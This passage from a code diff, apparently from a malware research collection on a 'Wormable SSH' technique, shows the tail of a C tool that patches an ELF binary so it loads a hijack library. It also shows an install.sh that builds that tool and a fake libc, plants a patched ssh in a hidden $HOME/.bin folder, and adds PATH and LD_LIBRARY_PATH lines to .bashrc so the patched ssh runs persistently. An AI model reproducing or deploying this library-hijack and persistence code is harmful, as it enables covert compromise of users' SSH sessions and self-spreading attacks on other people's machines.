output_path = argv[2];
|
||||
target_lib = argv[3];
|
||||
break;
|
||||
case 3:
|
||||
input_path = argv[1];
|
||||
output_path = argv[2];
|
||||
break;
|
||||
case 2:
|
||||
input_path = argv[1];
|
||||
output_path = input_path;
|
||||
break;
|
||||
default:
|
||||
printf("usage: %s <ELF_INPUT> <ELF_OUTPUT> <lib2hijack.so>\n", argv[0]);
|
||||
return 1;
|
||||
}
|
||||
|
||||
int elf_input = open(input_path, 0, O_RDONLY);
|
||||
|
||||
if (elf_input == -1)
|
||||
{
|
||||
perror("open");
|
||||
return 2;
|
||||
}
|
||||
|
||||
struct stat elf_statbuf;
|
||||
|
||||
if (fstat(elf_input, &elf_statbuf) == -1)
|
||||
{
|
||||
perror("fstat");
|
||||
return 3;
|
||||
}
|
||||
|
||||
char *elf_buff = malloc(elf_statbuf.st_size);
|
||||
|
||||
if (elf_buff == NULL)
|
||||
{
|
||||
perror("malloc");
|
||||
return 4;
|
||||
}
|
||||
|
||||
if (elf_statbuf.st_size != read(elf_input, elf_buff, elf_statbuf.st_size))
|
||||
{
|
||||
perror("read");
|
||||
return 5;
|
||||
}
|
||||
|
||||
close(elf_input);
|
||||
int ret = dynamicorrupt(elf_buff, target_lib);
|
||||
if (ret == 0)
|
||||
{
|
||||
int elf_output = open(output_path, O_CREAT | O_TRUNC | O_WRONLY, S_IRWXU);
|
||||
|
||||
if (elf_output == -1)
|
||||
{
|
||||
perror("open");
|
||||
return 6;
|
||||
}
|
||||
|
||||
if (elf_statbuf.st_size != write(elf_output, elf_buff, elf_statbuf.st_size))
|
||||
{
|
||||
perror("write");
|
||||
return 7;
|
||||
}
|
||||
close(elf_output);
|
||||
}
|
||||
|
||||
free(elf_buff);
|
||||
return ret;
|
||||
}
|
18
VXUG-Papers/Wormable SSH/Source/install.sh
Normal file
18
VXUG-Papers/Wormable SSH/Source/install.sh
Normal file
|
@ -0,0 +1,18 @@
|
|||
#!/bin/bash
|
||||
|
||||
cc -s -o dynamicorrupt dynamicorrupt.c
|
||||
cc -s -shared -fPIC c.so.6.c -o c.so.6 -ldl -DLIBC_PATH=$(ldd $(which ssh) | grep libc.so | awk '{print "\""$3"\""}')
|
||||
xxd -plain dynamicorrupt | tr -d \\n > dynamicorrupt.hex
|
||||
xxd -plain c.so.6 | tr -d \\n > c.so.6.hex
|
||||
rm -rf $HOME/.bin
|
||||
mkdir $HOME/.bin/
|
||||
cp *.hex $HOME/.bin/
|
||||
cp $(which ssh) $HOME/.bin/
|
||||
./dynamicorrupt $HOME/.bin/ssh
|
||||
cp c.so.6 $HOME/.bin/
|
||||
echo "export PATH=$HOME/.bin:$PATH" >> $HOME/.bashrc
|
||||
echo "export LD_LIBRARY_PATH=$HOME/.bin/" >> $HOME/.bashrc
|
||||
|
||||
export PATH=$HOME/.bin:$PATH
|
||||
export LD_LIBRARY_PATH=$HOME/.bin/
|
||||
|
BIN
VXUG-Papers/Wormable SSH/Wormable SSH.pdf
Normal file
BIN
VXUG-Papers/Wormable SSH/Wormable SSH.pdf
Normal file
Binary file not shown.
Loading…
Add table
Reference in a new issue